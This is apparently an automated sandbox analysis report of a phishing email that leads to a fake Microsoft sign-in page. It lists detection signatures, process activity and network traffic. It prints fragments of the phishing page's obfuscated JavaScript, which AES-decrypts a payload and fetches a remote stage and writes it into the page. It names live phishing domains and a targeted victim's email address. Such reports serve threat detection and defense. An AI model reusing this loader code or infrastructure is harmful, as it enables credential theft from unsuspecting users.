Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
(No subject) (59).eml

Overview

General Information

Sample name:(No subject) (59).eml
Analysis ID:1500037
MD5:6c6252a8c2a18d474c934f181a648984
SHA1:ac7172722a59aa3ae066ddb934aa7bbee235d9f8
SHA256:0c2d4fc907bd1735c4e4b3c08a6be70ab00df993a63bad7637e74ae9dfeda8d0
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish10
Yara detected HtmlPhish70
Yara detected Phisher
HTML page contains hidden URLs
HTML page contains hidden email address
HTML page contains suspicious javascript code
Phishing site detected (based on logo match)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Stores large binary data to the registry

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 6300 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\(No subject) (59).eml" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6872 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "A7A183EE-2C77-4E4F-B725-8BFB05112EFD" "BB25D3F2-0E53-48AB-AEB6-C8D394DB4A1D" "6300" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 4580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\9AYNO56K\https___worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev__eba.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 3684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1892,i,9245279310227330186,10471409212355805271,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_83JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    dropped/chromecache_92JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
      dropped/chromecache_90JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
        dropped/chromecache_89JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
          dropped/chromecache_95JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
            SourceRuleDescriptionAuthorStrings
            4.2.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
              4.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
                4.4.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev/?eba=.htmAvira URL Cloud: Label: phishing

                  Phishing

                  barindex
                  Source: Yara matchFile source: 4.3.pages.csv, type: HTML
                  Source: Yara matchFile source: 4.4.pages.csv, type: HTML
                  Source: Yara matchFile source: 4.2.pages.csv, type: HTML
                  Source: Yara matchFile source: dropped/chromecache_92, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_90, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_89, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_95, type: DROPPED
                  Source: Yara matchFile source: dropped/chromecache_83, type: DROPPED
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: https://glansaolksnu.ru///4539.php
                  Source: https://www.estampariaimagemeacao.com.br/js/images/tvavx.phpHTTP Parser: mthao@santaclaraca.gov
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: window.location.href = atob(
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==Matcher: Template: microsoft matched
                  Source: https://www.estampariaimagemeacao.com.br/js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauberHTTP Parser: var issue= document.createelement("script");issue.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(issue);issue.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiaeo4vdhymgn5bznuzxhjt00wsmv6rec0tlwvetcrrhbmtde5djznrjhnc09mr2jau3mydnoyvlblbgtlofwvmupwbtjvztbyz01eserstzz2dmliegkynwhqbghmzugrtnhocw9ja2ptotfucxf3cljtogezzk1sqnrwy0w1bw9er2vsxc9qnwddyjvqswoxofwvavy1y3bhdzbhduy3nctizvr4cvhin3dhq0q3twlzv1htcwxtdldhrjlrt3joadfpme5pqterwhk5tkw5nlplz013njnwn2nhsgziak5cl2nxsutxdhdtahzdr00rbzhxb25tetl4svljoevlsvlveem5tlh6clphtfjpy29uk2h1v1ljsnjyzthdtwzkr09ptzfedxr1u1vtmvzwdflwrhrxwdznck9ubtzym0dybeppylhmblwvaghtd09usxpxz01zqxzcl2vhng1ubnc0uknmakxxcer3mzztdfzhslzqbjfgtkdqc2nfdg5cake2r3lnxc9ftkt5umjmuhf5rgdxc1lqbtvgdfrhnlvvwfzdskt2q2roxc81cgxlt3dqajg3b1lzdte4evqwb2xqtwxpmnp0oesrdhd1ugp5reheowndbm5qc1azwmjnmjbzmmpxblwvogi2bgd6alljudrenwfob3nmk1vrbvy4rmxnawv5zthidwpzuhjheuxubuplqznpvutly2e3u0zib05ytnfmofbya21mnvozd1dsqutaamiwnhj1yld2utvqshjrngf...
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: async function labored(yachting) { <!-- driving is the rhythm of life in motion. --> var {a,b,c,d} = json.parse(yachting); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv: cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } async function iconoclast() {iced.hidden = 0;yearn.hidden = 1; document.write(await labored(await (await fetch(await labored(atob(`eyjhijoicvrtu0lxeuhmwxc4ajrsyxpwofztq0z1u05ltctcl24ywlfude1pvzbivdg9iiwiyyi6ijk2zjk4yzg0mmfmotjjntjkndfjogq2yjuxzdq1otc2iiwiyii6ijc2yzninmnkodgzzmmymda0oti1mwrinwixmmviywm5njcxogjiowiynta5mddlymmxm2i2mza5nwm0nduxymi4mjrinwq2ndyyytrjmjnizjayytnmnti5ntniytbmndm2ndzmzjqwmje0ymi4ytawzwe2nta3nzflyzyzmziyywnmndm5mtlkzjrmndq2zmzhndzmotg2zwnkmwrjztdjowu4odrhyji3zmmznzu3ytgyyzfmodjhoguzzdizy2myzjviowm2zjjhmzu5mzbkzgezodk5zmywzdi0ndgzztc4mzm2ztc2mzgwmzcymjq4n2jlyzrhzjjmnjdkymrlyzy1yme3owezytdhyjljmzlkm...
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: Number of links: 0
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: <input type="password" .../> found but no <form action="...
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: Total embedded image size: 45708
                  Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/9AYNO56K/https___worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev__eba.htmHTTP Parser: Base64 decoded: mthao@santaclaraca.gov
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: Title: Sign in to your account does not match URL
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: <input type="password" .../> found
                  Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/9AYNO56K/https___worker-rough-fire-759a.berwieberwieberwieberwieberwie.workers.dev__eba.htmHTTP Parser: No favicon
                  Source: https://www.estampariaimagemeacao.com.br/js/images/tvavx.phpHTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: No favicon
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: No <meta name="author".. found
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: No <meta name="author".. found
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: No <meta name="copyright".. found
                  Source: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/#BbXRoYW9Ac2FudGFjbGFyYWNhLmdvdg==HTTP Parser: No <meta name="copyright".. found
                  Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.16:49702 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.16:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49708 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49710 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.16:49711 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.16:49712 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49714 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49716 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49717 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49718 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.16:49754 version: TLS 1.2
                  Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
                  Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
                  Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
                  Source: Joe Sandbox ViewIP Address: 151.101.66.137 151.101.66.137
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
                  Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=USmGenYh+nnGnwz&MD=Om4EY1cl HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                  Source: global trafficHTTP traffic detected: GET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1Host: www.estampariaimagemeacao.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /js/images/tvavx.php?1-44636c424373417744415042487958332f735a466b5979684a6144513939655850637a6d4f6476586e4a476f4b454d68563149674d716973446c487154376c5a4362385062384e6a68355948316a642f-dauber HTTP/1.1Host: www.estampariaimagemeacao.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.estampariaimagemeacao.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.estampariaimagemeacao.com.br/js/images/tvavx.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://www.estampariaimagemeacao.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/6790c32b9fc9/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: glansaolksnu.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /, HTTP/1.1Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
